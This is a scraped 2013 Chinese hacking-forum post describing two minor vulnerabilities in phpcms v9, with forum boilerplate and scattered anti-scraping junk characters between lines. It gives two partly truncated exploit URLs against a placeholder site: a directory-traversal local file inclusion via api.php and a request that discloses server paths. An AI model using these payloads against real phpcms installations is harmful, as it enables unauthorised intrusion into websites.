找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2565|回复: 0
打印 上一主题 下一主题

phpcms v9两个鸡肋漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。$ {5 l1 P( t6 S5 Q, s' S4 z
$ M: t& h1 H  s& d  E9 Z
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck
0 @# ~/ d5 x/ q$ g& {1 \9 c
6 J) r9 C1 s. @) e& v#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
! Y0 C; {7 v9 p" l1 W* b& ~0 B0 l
1 k2 i4 R% c9 [Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy" _; j. g. Z2 O/ }+ V  z# S

# F+ Z  E. @0 T' R  V& T5 ^5 R; e#暴路径
; e# h# y$ _! I; ?) e
3 D8 F' y. Q# f; @注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
4 \5 e4 O) R! n. }1 K9 k6 k+ w
1 M2 d' b# v7 l  J/ R
1 G. f2 G0 P* l9 _) [
) c) Q3 T( w+ C7 X4 U7 r, B+1
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表